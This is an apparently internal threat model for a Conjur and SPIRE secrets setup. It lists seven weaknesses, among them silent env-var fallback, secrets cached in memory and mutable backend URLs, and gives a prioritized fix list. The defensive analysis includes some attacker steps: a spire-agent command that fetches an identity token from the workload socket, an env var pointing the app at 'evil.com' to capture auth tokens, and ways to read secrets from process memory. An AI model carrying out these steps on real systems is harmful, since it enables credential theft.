Secrets & Identity Threat Model

Honest assessment of what’s secure, what’s not, and what to fix.

The Catches

1. CATCH: Env Var Fallback = Silent Downgrade Attack

The problem: When Conjur is unreachable or doesn’t have a variable, the ConjurBackend silently falls back to os.environ. An attacker who can kill the Conjur connection (network partition, DNS hijack, firewall rule) forces the app to read from env vars — which may be stale, compromised, or attacker-controlled.

# conjur_backend.py line 104-108
env_val = os.environ.get(name)
if env_val is not None:
    logger.debug("secret_env_fallback", name=name)  # debug level — easy to miss
    return env_val

Impact: If an attacker sets env vars on the host (compromised container, malicious sidecar) AND blocks Conjur, the app uses the attacker’s values.

Fix needed: In production, the fallback should be configurable, with a fail-closed mode: if Conjur is configured but unreachable, refuse to return the secret instead of falling back. The fallback is currently logged at debug level, which hides it; it should be logged at warning at minimum.
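A minimal sketch of what fail-closed resolution could look like. It is not the actual ConjurBackend code: `resolve_secret`, `SecretUnavailable`, and the injected `fetch_from_conjur` callable are hypothetical names, and it uses stdlib logging rather than the structured logger shown above. The `fail_closed` flag would presumably be driven by a setting such as `CONJUR_FAIL_CLOSED`.

```python
import logging
import os
from typing import Callable, Mapping, Optional

logger = logging.getLogger("secrets")


class SecretUnavailable(RuntimeError):
    """Raised when a secret cannot be fetched and fallback is not allowed."""


def resolve_secret(
    name: str,
    fetch_from_conjur: Callable[[str], Optional[str]],  # hypothetical fetcher
    fail_closed: bool,
    env: Mapping[str, str] = os.environ,
) -> str:
    """Return the secret from Conjur; fall back to env only when allowed."""
    try:
        value = fetch_from_conjur(name)
    except Exception as exc:  # network error, auth failure, timeout, ...
        value = None
        logger.warning("conjur_fetch_failed name=%s error=%s", name, type(exc).__name__)

    if value is not None:
        return value

    if fail_closed:
        # Fail closed: never substitute an env var for a Conjur-managed secret.
        raise SecretUnavailable(f"secret {name!r} unavailable and fallback is disabled")

    env_val = env.get(name)
    if env_val is None:
        raise SecretUnavailable(f"secret {name!r} not found in Conjur or environment")

    # Warning level, so a downgrade is visible in default production logging.
    logger.warning("secret_env_fallback name=%s", name)
    return env_val
```

With `fail_closed=True`, blocking Conjur yields an error rather than an attacker-supplied value, which turns a silent downgrade into a visible outage.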

2. CATCH: Secrets Live in Process Memory — Unprotected

The problem: Every secret fetched from Conjur sits in a Python dict as a plain str. Python strings are immutable and cannot be zeroed out. They stay in memory until garbage collected, which may be never for cached values, and even after collection CPython does not wipe the freed bytes.

# conjur_backend.py — cache is a plain dict of plain strings
self._cache: dict[str, tuple[str, float]] = {}
# "sk-ant-api03-..." sits in heap memory, readable via:
#   - /proc/PID/mem (root)
#   - gcore PID (core dump)
#   - ptrace (debugger attach)
#   - memory forensics after container kill

Impact: Anyone with root on the host (or a container escape exploit) can read all cached secrets from process memory. A core dump (a crash on SIGSEGV or SIGABRT, or a manual gcore) writes them to disk.

Fix needed:

Disable core dumps: ulimit -c 0 or prctl(PR_SET_DUMPABLE, 0) at process start.
The cache TTL limits the window (secrets expire from cache after 5 min), but during that window they’re in plaintext memory.
Python cannot truly zero memory (strings are immutable). For the vault encryption key, crypto.py could use mlock() via ctypes to prevent swap, but this is hard in Python.
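The core-dump mitigation can be sketched in a few lines, assuming a Linux host and that this runs at process start before any secret is fetched. `disable_core_dumps` is a hypothetical helper name; the `prctl` call goes through ctypes because the standard library does not wrap it.

```python
import ctypes
import resource
import sys

PR_SET_DUMPABLE = 4  # constant from <linux/prctl.h>


def disable_core_dumps() -> None:
    """Best effort: keep the kernel from writing this process's memory to disk."""
    # Equivalent of `ulimit -c 0`, applied to both the soft and hard limit.
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))

    if sys.platform.startswith("linux"):
        # Marks the process non-dumpable; this also prevents unprivileged
        # processes from attaching with ptrace.
        libc = ctypes.CDLL(None, use_errno=True)
        if libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0:
            raise OSError(ctypes.get_errno(), "prctl(PR_SET_DUMPABLE) failed")
```

Neither call protects against root on the host; they only close the accidental path where a crash leaves secrets in a core file.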

3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?

The problem: The SPIFFE Workload API socket (/tmp/spire-agent/public/api.sock) is the root of trust. Any process that can open this socket can request a JWT-SVID and authenticate to Conjur as TapPass.

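# If an attacker gets a shell in the same pod or on the same node and passes
# workload attestation, the agent's own CLI is enough (the Workload API is
# gRPC, so a plain HTTP request via curl will not work):
spire-agent api fetch jwt \
     -audience tappass \
     -socketPath /tmp/spire-agent/public/api.sock
# → Gets a valid JWT-SVID → authenticates to Conjur → reads every secret TapPass can read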

Impact: Container escape, compromised sidecar, or same-node lateral movement = full secret access.

Mitigation (SPIRE’s responsibility, not ours):

SPIRE Agent uses kernel attestation (pid, uid, cgroups, K8s pod identity) to verify which workload is requesting the SVID.
The socket should be mounted read-only into only the TapPass container (K8s volume mount with specific pod selector).
SPIRE registration entries should be tight: only the specific pod service account + namespace + container image hash gets an SVID.

Our responsibility: Document this clearly. TapPass trusts SPIRE — if SPIRE is misconfigured (loose attestation policies), the whole chain falls apart.

4. CATCH: Conjur Admin Account = God Mode

The problem: Whoever has the Conjur admin API key can read every secret, modify policies, and impersonate any host. This is true for any centralized secrets manager.

Impact: If the Conjur admin credential is compromised, all secrets are compromised.

Mitigation:

Conjur admin should use MFA (CyberArk PAM).
Admin API key should be rotated and stored in a break-glass safe.
Separation of duty: TapPass’s host/tappass/server identity has read-only access. It cannot modify policies or read secrets outside its policy scope.

5. CATCH: Resolver Auto-Detection Can Be Manipulated

The problem: The resolver checks os.environ.get("CONJUR_APPLIANCE_URL") to decide which backend to use. If an attacker can set this env var (compromised Dockerfile, CI pipeline injection, K8s configmap edit), they can redirect all secret fetches to a malicious Conjur instance.

if os.environ.get("CONJUR_APPLIANCE_URL"):
    backend = ConjurBackend()  # connects to whatever URL is in the env var

Impact: Attacker sets CONJUR_APPLIANCE_URL=https://evil.com → app sends auth tokens to evil.com → evil.com returns fake secrets → app uses attacker-controlled API keys.

Fix needed: In production, the Conjur URL should be validated against an allowlist or pinned in the deployment config (not just any env var). At minimum, the TLS certificate verification (CONJUR_SSL_CERT_PATH) should be mandatory in production — pinning the CA prevents connecting to a rogue server.
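One way the startup validation might look, as a sketch under stated assumptions: the allowlist host `conjur.internal.example`, the `validate_conjur_config` function, and the `ConjurConfigError` exception are all hypothetical. Only the two env var names come from the text above.

```python
import os
from typing import Mapping
from urllib.parse import urlsplit

# Hypothetical allowlist; in practice this would be baked into the image or
# deployment config rather than read from the environment.
ALLOWED_CONJUR_HOSTS = frozenset({"conjur.internal.example"})


class ConjurConfigError(ValueError):
    """Raised when the Conjur connection settings fail validation."""


def validate_conjur_config(
    env: Mapping[str, str],
    allowed_hosts: frozenset[str] = ALLOWED_CONJUR_HOSTS,
) -> tuple[str, str]:
    """Return (url, ca_path) if the settings are acceptable, else raise."""
    url = env.get("CONJUR_APPLIANCE_URL", "")
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ConjurConfigError("CONJUR_APPLIANCE_URL must use https")
    if parts.hostname not in allowed_hosts:
        raise ConjurConfigError(f"Conjur host {parts.hostname!r} is not allowlisted")

    ca_path = env.get("CONJUR_SSL_CERT_PATH")
    if not ca_path:
        raise ConjurConfigError("CONJUR_SSL_CERT_PATH is required in production")
    if not os.path.isfile(ca_path):
        raise ConjurConfigError(f"CA bundle not found: {ca_path}")
    return url, ca_path
```

The allowlist lives in code here on purpose: an attacker who can set `CONJUR_APPLIANCE_URL` can usually set other env vars too, so the CA path is ideally pinned in the deployment as well.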

6. CATCH: The 5-Minute Rotation Gap

The problem: When a secret is rotated in Conjur (e.g., a leaked API key), TapPass continues using the cached old value for up to 5 minutes (the TTL).

Impact: A 5-minute window where a compromised key is still in use, even after rotation.

Mitigation already in place: POST /admin/secrets/invalidate forces immediate cache flush. But this requires someone (or an automated system) to call it.

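Fix needed: If the Conjur deployment (or the rotation tooling around it) can emit a notification when a secret is rotated, TapPass should expose a listener that calls invalidate() automatically, with zero human intervention. Whether Conjur supports such webhooks natively should be verified against the version in use.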
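The rotation gap and the effect of invalidation can be illustrated with a small TTL cache. This is an illustrative sketch, not the actual ConjurBackend: the `TTLSecretCache` class, the injected `fetch` callable, and the `clock` parameter are assumptions made so the behavior is easy to follow.

```python
import threading
import time
from typing import Callable, Optional


class TTLSecretCache:
    """Illustrative TTL cache; not the actual ConjurBackend implementation."""

    def __init__(
        self,
        fetch: Callable[[str], str],  # hypothetical fetcher, e.g. a Conjur read
        ttl: float = 300.0,           # 5 minutes, matching the TTL above
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._fetch = fetch
        self._ttl = ttl
        self._clock = clock
        self._lock = threading.Lock()
        self._cache: dict[str, tuple[str, float]] = {}  # name -> (value, expiry)

    def get(self, name: str) -> str:
        with self._lock:
            hit = self._cache.get(name)
            now = self._clock()
            if hit is not None and now < hit[1]:
                return hit[0]  # may be a rotated-out value until expiry
            value = self._fetch(name)
            self._cache[name] = (value, now + self._ttl)
            return value

    def invalidate(self, name: Optional[str] = None) -> None:
        """Drop one entry, or the whole cache when name is None."""
        with self._lock:
            if name is None:
                self._cache.clear()
            else:
                self._cache.pop(name, None)
```

A rotation listener would only need to call `invalidate(name)` for the rotated variable; the next `get` then fetches the new value instead of waiting out the TTL.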

7. CATCH: No Mutual TLS to Conjur

The problem: TapPass authenticates to Conjur via JWT (SPIFFE) over one-way TLS. The Conjur server is verified via its certificate, but Conjur doesn’t verify the TLS client certificate. The authentication is at the application layer (JWT in POST body), not at the transport layer.

With mTLS enforced on the Conjur side, even if an attacker intercepts the JWT-SVID, they can’t replay it because they don’t hold the private key for the TLS client certificate.

Fix possible: Use the SPIFFE X509-SVID (which TapPass already has from SPIRE) as the TLS client cert when connecting to Conjur. httpx supports cert=(cert_file, key_file). This adds transport-layer authentication on top of JWT application-layer authentication.

What IS Solid

Layer	Status	Why
No secrets in code/config/env	✅	129 callsites go through protocol. Only Conjur connection coordinates belong in env (not secrets); the env fallback in Catch 1 is the exception until fail-closed mode is in place.
Automatic rotation pickup	✅	TTL cache + invalidation endpoint. No restart needed.
Audit trail	✅	Conjur logs every secret read with host identity, timestamp, result.
No static credential for Conjur auth	✅	SPIFFE JWT-SVID from SPIRE. Auto-rotated every 5 min. No API key in production.
SPIFFE identity reuse	✅	Same SPIRE infrastructure for agent auth AND Conjur auth. Single identity system.
Protocol is open	✅	Backend is swappable. Conjur today, Vault tomorrow. No lock-in.
TLS to Conjur	✅	httpx verifies server cert. Never `verify=False`. CA pinning via `CONJUR_SSL_CERT_PATH`.
Thread safety	✅	Single lock protects cache + auth token. All Conjur I/O serialized.

Prioritized Fix List

#	Issue	Severity	Effort	Fix
1	Env fallback in production is silent downgrade	High	Small	Add `CONJUR_FAIL_CLOSED=true` mode. Log fallbacks at `warning` not `debug`.
2	Conjur URL can be redirected via env var	High	Small	Mandatory `CONJUR_SSL_CERT_PATH` in production. Validate URL against allowlist.
3	Core dumps contain secrets in memory	Medium	Small	Disable core dumps at process start. Set `RLIMIT_CORE` to 0.
4	No mTLS to Conjur	Medium	Medium	Use X509-SVID as httpx client cert for Conjur connections.
5	5-min rotation gap	Low	Medium	Conjur webhook → auto-invalidate.
6	SPIRE socket access = root of trust	Low (SPIRE’s job)	N/A	Document attestation requirements.
7	Memory secrets can’t be zeroed (Python)	Low	N/A	Language limitation. TTL cache limits window.